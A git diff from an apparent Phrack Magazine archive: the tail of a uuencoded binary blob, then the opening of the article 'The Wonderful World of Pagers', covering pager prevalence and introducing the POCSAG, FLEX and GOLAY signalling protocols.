+M^\'\PO_!_G_"_\'^<,/_P?G$_\'\P?_!^&!_P?_!_G_(_\'P?\+_P??"_\'PY
+M___-_\'CP?(`>,'^`<''P>,_O\'\P?YP`,'P#SC!_G#"^$..``C!_'_!_\+C7
+MP?'"Q\'^/\(?P?HX?GQX<'C!\\'_P</!QAA_P?C!X,'B`!YX0,'``\'_P<#!T
+MX`/!X!_!_P`_`,'P&`?!X'P`P?_!\<'SP>?!_GC!_\'P?T/!^'X/P?P?P_\?I
+MP__!^<3_P?C!_\'X`!_!_\'^?\;_#\'_P<`?G\'_P>/!S\'_P<!__O_-_\'C5
+MP?,?P?[!_\'9C\'CPA_!_GXX'\'^!QQ_.\'\P?`#C@`,P?X_P?_!X\'GP?.&"
+M#\'_PQ^"'GX<'CC!_A_!_X^&'C_!_,'`P<<?'AA^P<.'P?_"P\*'#\'_#PX<5
+M.!`'@AX`/\'RP>/!QQX<?\'P'@/!\`X''@;#_Q_!_\'/P?\9Q/_!_G_!_!\/&
+MPO\_QO\?P?\&!Y_!_\'GP<_!_P`/Q_^?]O_-_\'GP<<?O\'_P?V/P<?"'\'^"
+M?CT?P?\'''\_P?W!P`>/!@S!_S_!_\+GP?N`#\'_PQ\`'GX\##W!_`_!_P^&Y
+M'C_!_,'`CQ\>.7_"Q\'_P<?"A\*/P?\/#AXX(0>/P@X_P?W!PX\>''_!_#X'X
+MP<,.#QX.?G_!_Q_!_X?!_@'!_A^?P<_!_G_!_'\/PO\_P=_%_Q_!_P^'PO_!"
+M[X_!_\(/Q_\/QO_!_A^'QO\?YO_-_\'G!P\?PO_"AQ\/P?\^/\'_P<^''L(_+
+MP?_!QX>/#\'>P?\_P?_"Y\'_AX_!_Q_"#P8>?CX&/\'_!\'_GX<?/\'^!(\?S
+M#AO!_\+'P?_!QX?!Y\*/P?\/C@X[P>/"#XX>'\'^P<./#QY_P?X<'H>/P@\.]
+M/\+_#\'_!GX!P<8/!X8>?\'^?X\?GQ\'P?\/P?_!S[\/P?\/P<?!W\+_C\'_4
+M#X?'_X_&_\'&#P9_)\'_G\'_'P^?Y?_-_\'@!X\\P?QYPH?"'\'^/CS!_<''X
+MASP^/<']PL>?'\'\P?X_P?_"Y\'WC\+_PA\>#AQ^/`8YP?\'P?^?P<8^/\'\.
+M!(\?'C'!_\''P>?!_\+'P><'#\'_'XP,,<'PPA^./C_!_,'!CQX\?\'\P?B\?
+M@\'_GQ\>/,+_![X,<`'!P`\!@!Q_P?Q_CQ^>/P?!X`_!_\'`/@_!_C_!YY_"G
+M_X_!_P_!Y[_&_X_&_\'##P1^9\'_G\'_/`>?Y?_-_\'P+\'@>,'\(<'@+[_!T
+M_\'^('PAP>`'/"!YP?G"X8^!/,'\?\'_P>'!X\'QPN_!_\(_G#PX?GS!_\'YO
+MP?_!\<'_G\'F?#_!_`1//YQPP?_"X\'_PN/!X8`GP?\_P<``<<'X!S_!['P_(
+MP?C!X,'/'GC!_\'XP?`@8,'_OY^^>,+_`#Q\8<'QP>'!XP/![3Q_P?A]#C^,/
+M/"#!X&?!_\'`/`_!_#_!_YQXP>/!S\'_C\'C(<'@P?^AP?@_P>`/P?_!_<3_#
+MP>/!QSQXP>'!_\'OP?QPP>'![^7_S?_!\,'_P?#!^<'\8<'P?\+_P?Y`?`'!6
+M\%=\8''!^,'@P<'!Q\'`/'!YP?_!\<'SP?'!X\+_PC_!V'@X?GS!_,/QP?_!\
+MW\'F?'_!_`P./YQPP?_!X\'SP?_"X\'A@,+_/\'`8,'QP?@"O\'D?'_!^,'@7
+MP=X>>,'_P?C!\`#!\'_!_Y_!_G#"_P#">&'!\,+CG\'\.,'_P?AP/#^\.,'P%
+MP>'!Y\'_P<`\/\'\?\'_F'C!X\'/P?^/P>,!@'X`P?!OP<`<P?[!^,'VP?'"*
+M_\'GP<9^>,'AP?_!Y\'\<,'QP>_E_\W_P?/!_\']P__!^,3_P?#!_\'WP?C"1
+M_\'P><'\P?!QP>/!X'S"<,'_P?#!\\'QP>!_P?_"?\'\<#C"?,)XP?#!\<'_0
+MP>/!]GQ_P?P\/C_!_GC!^,'CP?/!_\'SP>/!\</_/\'HP?C!\<'_P?`_P>Q\)
+M?\'\8,(^>,'_P?C"\,'X=\'_P?Y^<<+_.<'X<''!^,'@P>/!_\'X.,'_P?@@F
+M?C_!_#C!^&'#_\'^?\'\?\'_O'C!X<'OP?_!X,'C,'!X<,'PP>/!X#Q\>#!@)
+MP__!X'YXP>!SP>?!_,'PP?G!Y^7_S?_!\]#_P?!_P?_!^'O!X\'PP?\`P?C!>
+M_\'PP?/!^\'@/\'_PC^>`!Q^'`!YP?!AP?_!X!Y^?\'^#,(?GGC!^,'#P>/!-
+M_\'CP>?!XY_"_Q_!S,'^P?G!\\'A'\',?'_!_`@?'GC!_\'XP?#!^\'_P<?"6
+MGS\SPO\_P?@`8\'YP<`#/\'P''_!^``>/QPXP?!@PO\?P<\_P?Q_P?^>>,'CX
+MP<_!_P`#'CX8>&'!PQX,?'@88,/_P<9^,,'@`\'GP?C!\<'_P</E_\W_P??/D
+M_\'^?G_&_\'?P?[%_W_!_\*_P=^'G\(?`\'_P?X'P?_!X!_"/\'_PQ^>/@/!W
+MQ\'GP?_!P\''P>>/G\'_#PX>>\'SP>,/CCX_P?X.'QX<?\'\?,'_P=_!QY_"S
+M'P/"_Q_!_@]GP?F"!Q^`'G_!_A["'PX8`'`?P?\?CQ_!_C_!_YX9P>?!S\'_F
+M``\>/QY_P<?!PQ\./AP87L/_#C\;P>`#P<?!_,'"#\''Y?_=_\'^#G_4_S^?-
+MC\+_#\'_P?X_P?\_P?_$'WX'P<_!Y\'_P>/!S\'GAQ_!_P\?#'_![0>/'CX_.
+MP?\.'QX^?\'\?#[!SX>?PA\'PO\?P?X_P>?!^8_"'P\>?\'^?P\?#AP'?@_!Y
+M_Q^//\'^/\'_'AO!YX_!_P8/'C\>?\''!Q\./CQ\?G_"_PX_!\'C@X?!_,'`C
+M!\'/Y?_>_P?D_Y_!_P_$_\+OP<8?P?\&'P?!_\'^!X8?PC_!_P[#'W_!_CX'3
+MP<<'C\(?AY_!_Q_!_C\GP>N/P<\?#QY_P?Y_CQ\/'Y_!_X?!_Q^//\'_/\'GF
+M#P?!QX_!_P_!_Q]_C\'_P<('/PX^/W@.?\+_#C\'P<?!_\''P?_!P@?!Q^7_'
+MWO\'\/\$?X?!_\'^#\'@/\'_/\'_'C\>/,'_P?P^`<'@#X_"'X>/P?\_P?X^/
+M,<'APL?"'QY_P?Q_CQ\>/<+_P>?!_Q^//\'^/\'G'P/!YX_!_P_!_QY_G,'_;
+MP<`'/PP^/,'X`'_"_X0_`\'GP?G!Y\'\P>"CP<?E____T/\_Q?_!^<G_P?W!5
+M_\'AP?!_P>?"_\''P>_!_S_!_B!X8<'AP<<_*!A_P?C!_\'//3PXP?C!Y\'C2
+MP?_"OS_!_S_!XY\!P>/!S\'_C\'_/G^8P?_!X<'_/[Q\>,'P8,/_P>!_(<'AC
+MP?G!X\'XP?'!\,'CY?___]#_/]+_P?C$_\'/Q/_!X,'X0<'P#\'_P<`0P?_!Z
+M^,'_P<^`/'APP>'!X\'_P=!^?\'_,\'CG\'#P>/!S\/_P?Y_N,'XP>/!]G_!Z
+M_'QXP?#$_\'@?G'!X<'QP>/!\,'QP?#!X^7____0_W_<_\'PP?AQP?!_P?_!-
+MX,'XP?_!^,+_P>#"?&'!\&?!_\'@?G_!_\'@=\'_PN/![\/_?GA\>,+S?GS"J
+M>,'XP?S#_\'@?G'!\<'XP>/!^,'QP?#!\^7____H_S_'_\'YPO_!\<7_P<!_I
+MP?X#P?`?P?_!X,)_P?_!P#_!W\''P>?!S\'_'\'_/P!^<,'QP<<('CAXPOC"7
+M_\'/P<(^<<'AP?'!X\'XP?/!\,'CY?___^?_P?X?T__!W\'_G\7_P<8?G\'?F
+MP?_!W\'_G\'_'X!^`\'P#X`?`#[!_AC"_\''AQX[PL/!Q\'\PO/!Q^7____H#
+M_S_E_X_!_P_!_@^&'P1_P?X'P>?!_\'&#PQ_P<$'P<?!_,'S!\'/G^3_____;
+M_];_C\+_#\'GP?_![Q^'P?_!Y@^/POX'P<\?Y/______VO_!]\3_P?W!_Y^/D
+MP?[!_P_!S[_D_______:_\'SQ/_!^,/_P?S"_\'OY?_-_\CPP?'!\,/QP?#!$
+M\<'Y___\_\'SQ/_!_L/_P?Y_Y__-_\'PQ6#'<,'P<,'PP?G!^,+_P?W!^___8
+M^__!_L3_?^?_S?_!^\'XP?'!^,'P8,-`<,-``,-`Q`#"0&!PP_#!^,/[P__!*
+M^______;_]'_P=_%GP\>#PX?#PK"!LH"!L,.PA\/PQ_!W______7_^+_PY\?O
+MQ`\'#\D&#L(&RP^?O\'?O______%_^C_P=_#C\,/!P\'#\,'QP;&!\0/PX^?I
+MP_^?PM_"_\'?___W__;_O\'_O\*?K\(/P@["!,(`!,4`!,0`!,(&!\,/CQ^_^
+MPO^_PO^____L__W_P_W!\<+PP>#"8,D@Q@#$(,/@8,'@8,'@8,'@P?'!\,+YI
+MPOW__^/_S?_!_F/!X,'WP?S"]\'@P?_!\,'\P?'!X,'WP?#!^,'\P?/#_\'WZ
+MZ/_!^<+QP?C!\,'QP_#"X,+PP>#+8$#$8,7PP?'__]S_S?_!_'/!X,'WP?C!/
+M\\'WP>#!_\'P?&'!X'?!X,'P?'/!_\'SP?_!\</_P?GK_\'XP?W!\,/XR/!P$
+MP?#$<,5@<&##<,'PP?C!^<'[Q/W__]/_S?_!Q'O!W,'GP<QAP>9XP?_!PWS!;
+M^YO!XQAP>$'!_@'!S@'!\<'_P?/!P'O!\X#!\'_#_\'XP?_!_L'Q]/_"^\'X@
+MP?#"0,(`0,8`0,(`0'!@<,'PP?C"^</[P?G!^___Q?_-_\'.?Y_!YXY#P<8^$
+MP?^/GL'_G\'F'G><&\'^`XX+P>/!]\'GP<`_P?<`8!_!_W\_P?X?P?X'G@_&T
+M_\'?[_^?C@X/#@(.`LH`Q`+"!@\"!@X/PQ___\W_P<\/C\'GCD5.?\'_G\'.+
+M'X_!YS_!_\'^/\'^/XX_P>'!Y\'#P?P_P?<>9Q_!_C\?,@_!_P^.#Y_!QC_"4
+M[\'_!\'OA\'_?L(/PO\/PO_"#\'_/Y_"_\'?Y?\/CP_"'\</#L(&!,@&#L4/5
+MPQ_U_\W_P<\'A\''CD<&?\'_'\'.#X?!YS_!YYX/P?\?CW_"Y\''P?_!]\'G@
+M'F?!_\'^/AXWA\'_PH\/G\''/\'/P<?!SP?!QP?!_G["!\'_;@_!_W_"!\'_/
+M'P_"_X_#_Y^/YO_#G\2/Q0\'P@_"!P;"!\,&PP?)#X\/PH^?Z/_-_\'/@\'\>
+M)XY&!G0_O\',!X?!YG_!\`P!P?\'A\'_P>!GC<'\P?/!XQYGP?_!_#X.<\'S9
+MP?^/PY_!S\'_P<QCP<X<9Q[!_#_"'\'^<!_!_CP'`,'@#@3!Y\'_@,'OP<_!4
+M_!\'P>0_P>0_Q/_![Y_!_[^?P?^_Z_^_G\(/#`3+``0`P@8$!P\?OY^_G[_!T
+M_\._VO_-_\'GP?'!^&?!S&0$<'^_P>PG@<'F?\'P.`'!_X&`P?#!X&?!R,'XK
+MP?'!\R!@P?_!^#P,PO'"_\._P>_!_\'LP>'!YGQB?\'X?SY_P?YQP?_!_#TOX
+MPN'!SC!AP>>@P>/![\'P?"'!X'_!X#W$_\'@.<'@?"/!_\'CP>#!_\'@PO_!P
+M\<'YV?_!_<[_POW!\,/@Q&#!X,(@`"#%`,8@8,,@PF#!X,/QP?7!_=+_S?_!2
+MX,'PP?AAP>!BP<!X?\'_P>S"_\'R?\'QP?C!\<'_P?#!P,'P8&/!P,'XP?'!$
+M\P#!\'_!\<'\8,+QQ?_!X,'_P=S!\,'F?&!_P?!_?G_!_G'!_\'X/\'_P?/!0
+MX\'B>&#!\\'_P?'!_\'QP?C!\,'@P?_!X,'YP?_!Q\'N?L'P>,'@P?C!\\'\T
+M8<'@?\'@?F/!X,'P?,'_P?##_\'\P?/1_\'\VO_!^<'PP?C'\,'@P?#!X'!@O
+MP>#$8'#&8,'@P?#/_\W_P>#!\'APP?ACP>!X?\'_P?S"_\'P?L'QPOC!_L'XA
+MP>#!^'#!XV#!^,'QP?-PP?#!_\'PO'#"\<7_P>!_P?C!\,'V?&!_P?!_?G_!)
+M_'#!_\'X?\'_P?/![\'@>&#!]\'_P?!_P?'"^,'WP?_!\<'YP?_!Y\'\?,+X4
+MP>#!^,'_P?QQP>#!_\'@?'/"\'S!^<'@?\+_P?AQT?_!_.#_P?O!^<']POG%&
+M^,3PP?C#\'#!\,-@S__-_\'L`<'`<!S!Y\''@'_!P#S"_\'W@'#"^,'\>,'$7
+M>&/!PP#!^,'QP?-\<\'_P?`<<'/!\<'_P]^?P>'!_\'<P>)&?F)_P?`_?@/!1
+M_G`?P?C!W[_!\\'/P>(`8&.!P?A_P?#!^<'\9\'?P>/!V<'_`\'.'L'\P?G!)
+MY\'XP?_"^,''P=_!Y\'&PO_!\\'X><'@'X_!S\'X`-'_P?W!_\'QP?_!_L'[8
+M[__!^\'XP?G/_\W_P<\'@GH>P>^/@'_!P!_!_Y_!YX)R'L+^'8X>)X<.?\'[5
+MP<<^9\'_P>`.,'/!\\'_Q)_!S\'_GD8&?D9_P>(?/@_!_@(?P?G"'\''C\'FP
+M`$('`L'\/\'P&<'^1Q_![Q_!_P?!SA[!_L'YP<?!_!_!_L']CY_!QX[!_Q_!O
+M_\'\?<'/'P^/'QY_TO^#P?_!_@>/___!_\[_G\7_P<_&_X_!_@_"_P?!SP9O0
+MP<_"/\'^#SYG'\'GCCPSA\'_PH^?'\'/P?^.9P\^!S]`'\(_P?XOP?_!^`\?U
+MP>>/P<8.9P</P?Y_P?(=P?X$'\'@'\'_%\'.#G]]P<8\#\'_P?X''\'/P<;")
+M#\'G/!W"CP^''\(_TO\./Q_"#___P?_=_P_"_P_!WX=_P>_"?\'_#\'_9A_!*
+MY\'./C</P?^/PI\/P<_!_X[![X\>1Q\'#\(_P?XGP?_!X@\?P>>/A@Y'!X_!C
+M_L'_P?>_P?X''\'''\'_!\'.#\+_ASX/PO\&'\'/AL('P<8>'\*/!X>?'S_2P
+M_P\^'\(/___!_^C_O\+_'\/_P?P/P?_!WY^_A<'`/Y[!_XX!P>>,PL\_#\'^[
+M?\'_P>>/G\'GP<>&/F>'G\'^P?_!]\']P?[!QY_![\'_P?X!P<YDP?[!_<''"
+MP?R_P?W!_(<?P>?!Q@\'P>0\B<'/C@>/G\(_TO^?/A^/'___P?_O_\']Q?_!@
+MX<'@/\+_P>\!P??!X<'OPO\AP?[!]\'_P>?![\'_P>?!X(Y\8\'GN<'\P?_!&
+M\\'XP?G!Y\'_P>_!^<'\(,'NP?#!_,'YP>?!^,'_P?C!_<'GO\'GP>3!_[_!J
+MX<'XP>'![\',(\'YO\(_T/_!_<'_OSR?P?\____!__7_P?/!^<3_P??!_\'S+
+MP__!\</_P??#_\'P?L'^P?/!Y\'`P?S!_\'SP?QQP>?!_\'GP?C!_,'PP>S!:
+M\,+XP>?!^,'_P?C!\<+_P>/!Y,+_P?/!^,'AP?_!T`'!^#_!_W_0_\']PO_!+
+M^,+_P<#__\'____*_\'XQ/_!\,'\P?_!\\'^<</_P?A\P?C!_,'XP?S!^,'_]
+MP?C!_\'XP?'"_\'@?,+_P?'!^,'QP?_!^''!_,-_T/_!_<'_P?YXPO]@___!&
+M____S__!^\C_P?QOP?[#_\'YP?_!_<'_P?X#PO_!X'X#P?_!\'C!\<'@&,'Y;
+MP=S#/]#_P?W!_SX8#\'?F___P?___^/_#\+_P>8^!\'_P?`?P?O!PAO!_Y\?K
+MPC_2_QX8#Y\?___!____Z_\?P?_![W_!_\'?/[\_TO\>/P>/#___P?____/_R
+M/]+_#V?!YY\/___!_______%_\']P?^'P_^$___!_______%_\']___'____G
+M___%_\']___'_______%_\']___'_______%_\']___'_________\W_____L
+M____S?_________-_______%_\']___'_______%_\']___'_______%_\']1
+M___'_______%_\']___'_______%_\']___'_________\W_________S?__W
+M_______-_______%_\']___'_______%_\']___'_______%_\']___'____%
+M___%_\']___'_______%_\']___'_________\W_________S?_________-]
+M_______%_\']___'_______%_\']___'_______%_\']___'_______%_\']`
+M___'_______%_\']___'_________\W_________S?_________-________T
+M_\W______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7__
+MP?W__\?_________S?_________-_________\W______\7_P?W__\?_____\
+M_\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?_P
+M________S?_________-_________\W_________S?______Q?_!_?__Q___5
+M____Q?_!_?__Q_______Q?_!_?__Q_______Q?_!_?__Q__________-____$
+M_____\W_________S?_________-_______%_\']___'_______%_\']___']
+M_______%_\']___'_______%_\']___'_________\W_________S?______O
+M___-_________\W______\7_P?W__\?______\7_P?G__\?_SO_!^?__]?_!2
+M_?__Q__._\'YP?O___3_P?W__\?_S?^&`@`"`,D"Q`8.Q1\/P=______Y?_-X
+M_X\'Q08.Q@;$!,(&PP\.PP\?G______B_]#_P=_"G\/_P<^_G\*/#X_&#\T'0
+MQ0_"C\.?P?^/_____]#_X/^_PO^_PH\/!L0$QP`$P@8'P@^/GX^______\__J
+M[/_!_<+YPO'!^,'QP?#!X"#!X,(@P@#)(,)@P?'!X<'@P>'!\<']]__!_?__$
+MQ__S_\'[QO#!X,'PP>#&8$!@0,)@P>!@P>#!\,+QP?#!_\']\O_!_?__Q__-Q
+M_\'\P?_!\<3_P?/!_\'PP?S!^\'YP?_!^<'XP?W?_\+]P?_"^</XQO#%<,)@_
+MQ'#&\,']P?_#^,'[P?W"^=[_P?G__\?_S?_!_`_!X<3_P</!_\'PP?Q[P>'!K
+M_\'AP?#!_>O_P?/!\,)@0'#$0,8`0&!`PG#!^&#"X,/PP?O!_\+[VO_!^?__A
+MQ__-_XX'!L''CL''P<\.P?^&'`<&P<X"P>(<!QX/P__!_G\^#\+_P?X?P=_!8
+M_Q_!W^;_PM^>P@_##LD"`,("Q@8/#A^?P=___];_S?\,#PY/CD>/#\'_CQ["N
+M#XX.9QP''`_!_W_!_\'^/SX/PO_!_@^/P?X/C\+_'^;_G\+?GQ_'#\,.R`8.-
+M!@\'Q0_#'\'_O___S?_-_XX?#\''CD>./\'_'X_!_Q_!SA_!Y\'_P?>_C\'^G
+M/\'^?L(_C\'_P>?!_P>&,P\'P<8>!\'_P<_![\'_!\'_P<_"_X_"_\'/ZO_#9
+MC\(/C\0/P@?$!@?"!L,'PP^/P@_"CY_!W___P?_-_XP_#\''C&&&?\'_/XS!6
+M_Q_!SG_!Y\']P?/!_<'_P?P]P?A^/CS"_\'AP?F'C#`'#\'`'`?!_X_!Y\'OO
+M`\'_A<+_A\+_P<;&_[_!_[_J_[^?CP["!@`$QP`$P@#"!,(&P@___\W_P<PCY
+MP>#!YXC!X,'D<,'_O\'L)@'!Y,'_P>!XP>'!^,'_P?@YP?!^PCS"_\'@P?G!B
+M\;\QP>,_P>/!^,'SP?_!Q\'AP><XP?_!X&?!Y[!YP?/!P,'_P>_"^<'OP><AK
+MP?`X(_'_P_W!\,'YP?'!\,'@8"!@Q"``PR#&8,/@Q&#!X"#"8,'@P?##^>;_%
+MS?_!W,'CP>#!Y\'8P>#!P'#"_\'L8@#!Y,'_P>!P8\'X?\'X><'P?,(XPO_!/
+MX,'YP?'!_\'QP>-_P>/!^,+_P</!X<'G>,'_P?AGP>;!^'#!\\'QP?_!S\'Y@
+MP?'!Q\'F(,'P>&/Y_\'XP?G'\,'@8,'@Q6!`PV#%0,(`0&!PP>!@PN#$\,+Q2
+MPO#<_\W_P?G!\<'X9\'XP>8@>,+_P?S!_GG!Y,'^P?#!^,'SP?[!X\'XP?'!2
+M\'QP>'_!_\'@><'YP?_!\&,PP?#!^'_!_\'QP?#![GQ_P?Y@P>9^>,'SPO_!R
+MX\'XP?'!Y\'F>,'QP?C!\?__Q?_!^<'PP?S!\,'YP?C!\,/XS?##<&!PQ&!P;
+M8,)PPO##^=/_S?_!R<'SP?QGF,'F`'Q_/\'<P?]_P>3!_L'CP?C!\\'_P>/!!
+M^<'!P>`^0#AOP?_!P'G!^;^P`P#!\'@/P?^QP>#![WY_P?Y@P<9^>,'SP=_!B
+M_\'#N<'QAX9XP?/!^,'S___:_\'[P?_!^\'PP?/!X,'PPF##0,4`0,)@<,'Y[
+MP?O0_\W_P<X#'@<>P<>&''^/'L'_'\'.'F?!_\'[P?_!]\'_P<'!PA[!PSS"4
+M_X`[P?N?$X<?P?\?@\'_`<'N#\(_@$`.?QL3@L'_@YG!^X<'#,'WP?S!T___6
+MYO_!W\(?'@X&Q@+/_\W_C@<,)QY/CPQ_CS_!_S^/#V>_PO_!Y\'_P>.''L''<
+M/\+_A#_!_Y\WP<\?P?\?A\'^`<'O#\(_AT<.?QL7A\'_#QW!_X</!<'G/`?_J
+M_^O_O\0/#@?/_\W_P=\/A\'O'\'OCX?!_\''/\'_O\'/!\'F#\'_P?X'PO_".
+MC\''/@_!_X\?AY\WP<<?P<^/P?_!_@?![P_"/X_!Q\'//Q^'C\'_CQ_!_X</_
+M!L'G/@?___'_P=_/_\[_O\'OP?]_PO^/P?_![\3_A\'@'\'_P?X/PO^?P=_!8
+MYSP'P?^?N`>,-\'G#\''F<'QP?X(P>\//G^?P>?![CX[@Y_!_YP=P?N0+QS!Z
+MY\'\!______"_]S_P?W)_\'\8\+_P?AGP>#!^\'S`,'@."'"_,'OP<\@PO_"`
+MYSAYP>/"_\'\.,'QF&=\P?/!^,'S_____\+_ZO_!^,'_P?'!_\'WP>#!\'QG4
+MPOS!_\'O8,+_PO?!X,'[P>/!X,'_P?YXP>'!^,'F>,'SP?#!\______"__?_W
+MP?O$_\'PP?O!\\'@P?_!_L'X8\'XP?9PP?#!^,'S_____\+____!\,+_P?X?$
+MP?W!_P#!\#G!^______"____Q/_!W\+_P=_!_A______P__________-____J
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_________\W_________S?_________-_________\W_____R
+M____S?_________-_________\W_________S?_________-_________\W_R
+M________S?_________-_________\W_________S?_________-________]
+M_\W_________S?_________-_________\W_________S?_________-____R
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_________\W_________S?_-_\,/PA_"GS_!_\*?______3_'
+MS?_#!\4/Q(_$G\'_G[_"W______J_\W_CL($T``$`,,$`,(&P@["#Q^_G[_"R
+M_\*______]C_S?_!^,'PP>!@Q"!@Q2``(,H`PB``PR#!X&!QP?#"X<'QP_W_@
+M____U?_8_\'[PO_!^\'_P?G!_\'PP?',\&#"X,1@0,1@P>#!\,'@Q?#_____F
+MR__@_\']P?_!_<'XP?W#^,'YP?S"^,3PQ'!@<,1@<&#"<&##<,'XPOG!_?__G
+M___&__O_P?O!^,/P8,'`0,@`PF#!\&!XP?#!^?__^?_]_\+?PI^/#L("``+%.
+M`,,"!@(.'@^?PM____3____)_[^?Q0\.PP\.R`8.!LH/PA_!_\'?P[___]S_7
+M___,_X^?PX\/CP^/#\,'QP8'PP;%!\0/C\(/C___V____]S_O\'_OY^_P?^/'
+MP@\&Q`3'``0`!`7"#Y\?PK___]'____A_\']P?O"_\']POE@P?#!X,)@QB#"1
+M`,4@8,'AP>#"\</]___*____P__!]^__POG%\,9@PD#"8,'@8,'PP>#!\,)@\
+MP>#(\,'QP_#!\\'YP__!^>W____"_\'^<\/_P?GM_\3XPO!PP?!PP?##<,I@I
+M<,5@QW#&\,+XP?#!_\'YP?O!_<'YY/___\+_P?1SP__!P'_!_<+_P?G!\'_!D
+M_`'&_\'XZ__"^<'_P?O!^,'[P?_!^\'XPO!PPD#"8,-``,=`S`##0,'@<,'[<
+MP?G:____PO_![G_#_XX_Q/_!\'_!_@/&_\'^'_;_PI_"WY\?P@X>#QX?'A\.<
+MP@8"#L4"Q0#"`@#"`@X?#\*?U?___\+_P<X?A\'G?Y\?P?["_\'\9\'_P?X_<
+MPO\_PO_![\'_#\;_/\'&'\/_AW_)_\'?]O^_GQ^?'\(/PP[(!@["#\_____"N
+M_\'.#X?!QW^/'\'?P<?!_\'J9\'_P?[!_\'/P?\_PO_![\'_A\'_G\3_/\''O
+M'\/_AW_)_X_]_\'OPH_$#\,'PP8'S____\+_P<\'C`8_A#>,P<9_P>1@?\'^0
+M'X3!P#@<9,'GP?_!]\'_G[\?P?\^/\'/G\'_P?Y_CG_$_\'?Q/\`Q?\'P?_!&
+M[\'_P>?^_Y_"O\_____"_\'OP>&`8'^`<\'(P<!_PN!_P?PCP<#!X#`X8,'GS
+MP?'!\\'_O3P_P?Q^?\'OP?W!_\'\P?^\><'_P?O!_\']Q?\PQ/_!_B'!_\'CK
+MP?_!X,3_P?G__\S____"_\'OP?B`P>#!_\'0<\'HP<!_P>#!_L'_P?QSP<!/Q
+M(+G!^&?!\$/!\<'XP>#!_\'XP?9_P?_!_,+FP?_!^''"X,+P/<'_P?C"_\'\#
+MPO!_P?_"^,'_P?'!_\'@?\/_P?#!Y___R____\+_P>S!^,+PP?_!^'/!^,'@Z
+M?\'@PO_!_'-`?F`YP?AGP?!C<<'XP>#!_\'XP?Y_P?_!_,'^P?;!_\'P<<'PQ
+MP>#!\'`]P?YX?\'_P?S"\#Y_P?C!^<'_P?'!_\'\?\'YPO_!\,'G___+____*
+MPO_!S''!V,'APO\SP<C!S\'_P<!_O\'\P?\!P<\@P?G!X&?!\<'C><'8!E_!"
+M\<'F?\'_P?S!\,'F?X#!Y[S!W\'@(\'(P>9YP=_!_P#!X&'!S&?!^<+_P>/!/
+M_\+?P?!X?\'SP>?!S\'_P>?!\G___\;____"_\'.`X_!SG\?$PS!S\'_@'^?F
+MP?[!_Q_!SP?!^\'&9\'[P<<[G`X?P>?!YG^?P=[!YL'.?X?!YQX?P<8'C\'&Z
+M.9_!_P+!W@>>'\/_A\'_PI_!PG@?P??!QP_!_P<&'P]____$____PO_!SP_!K
+MS\'OP?^?/@_!QG_!_V8?PO^.P<XO'XXGP?_!]S\/P=^'P?_!SW_!SXYWP>Y_V
+MG\'O'@_!Q@^/P<=X#\'_#\'L#Y\/P_^'P?_"C\'/'X_!_@8'/P?"#@<?___$R
+M____PO_![X_%_Q_!Y\+_P>8_PO^'P<8O'XXGP?_!YP?"CX?!_X]_P<\.=\'.&
+M?Y_![QX/P<\/C\''?Q_!_Q_!Q@^?#\/_!\'_PH_!SY^/P>(&!R<'P@X''___C
+MQ/___]3_?\'G?\'_P?<#G`X/P?P?P?_!QA[!\\'N?Y_!YXR.P<<G#,'&><+_R
+MOXPGG\''P_\0P?^?C\'/EX_!\00#!@,^'@<?___$____V?_!X\'\/#_!^#_!P
+M_\'P?\'QP?["_\'GP>'"X'`\P>9XP__!P&?!_<'GP?S!^,'_<,/_P>^QP>_!-
+M\<'D(R0#/``GO___Q/___^#_P?G&_\'QP_!\=L'X?,+_P>!WP?QGP?QPP?_!S
+M\,'_P=C!_\'FP?/!_\'SP>#!_\'$?\'_P>#__\;____H_\'YPOC!_L'_P?QXE
+MPO_!\,'_P?QWP?YAP?_!\,'_P>!_P?![P?_!\\'PP?/!_'O!_,'@P??__\7_&
+M___X_\'CP?_!X,'_P?!_P?_!\\'^`\'?`SQ&1___Q?______PO\/P?\/OA\/1
+M/___Q/______R/]____$_________\W_________S?_________-________S
+M_\W_________S?_________-_________\W_________S?_________-____R
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_________\W_________S?_________-_________\W_____R
+M____S?_________-_________\W_________S?_________-_________\W_R
+M________S?_________-_________\W_________S?_________-________]
+M_\W_________S?_________-_________\W_________S?_________-____R
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_"'Y_"W________\C_S`\?G\'_O]/_PI_#_\*_2
+MSI_#O\'_QI^_RY^_PI^_G[_!_\6?P[^?O___[/_)!\@/C\*?Q?_(GX^?_X^/'
+MPY^/G\*/R)_!WY_"W\'_P=___]/_WP3&!@?'!L0$Q08'Q0\'PP8'#P</!\0/1
+/!]0/C\2?C\F?SK___]#_K
+``
+end
+sum -r/size 36774/43500 section (from first encoded line to "end")
+sum -r/size 656/73815 entire input file
diff --git a/phrack46/8.txt b/phrack46/8.txt
new file mode 100644
index 0000000..0d29e49
--- /dev/null
+++ b/phrack46/8.txt
@@ -0,0 +1,487 @@
+                              ==Phrack Magazine==
+
+                  Volume Five, Issue Forty-Six, File 8 of 28
+
+****************************************************************************
+
+
+                     The Wonderful World of Pagers
+
+                            by Erik Bloodaxe
+
+Screaming through the electromagnet swamp we live in are hundreds of
+thousands of messages of varying degrees of importance.  Doctors,
+police, corporate executives, housewives and drug dealers all find
+themselves constantly trapped at the mercy of a teeny little box:
+the pager.
+
+Everyone has seen a pager; almost everyone has one.  Over 20 million
+pagers are on the streets in the US alone, sorting out their particular
+chunk of the radio-spectrum.  Another fifty-thousand more are
+put into service each day.
+
+But what the hell are these things really doing?  What more can we
+do with them than be reminded to call mom, or to "pick up dry-cleaning?"
+
+Lots.
+
+
+** PROTOCOLS **
+
+Pagers today use a variety of signalling formats such as POCSAG, FLEX
+and GOLAY.  The most common by far is POCSAG (Post Office Standardization
+Advisory Group), a standard set by the British Post Office and adopted
+world-wide for paging.
+
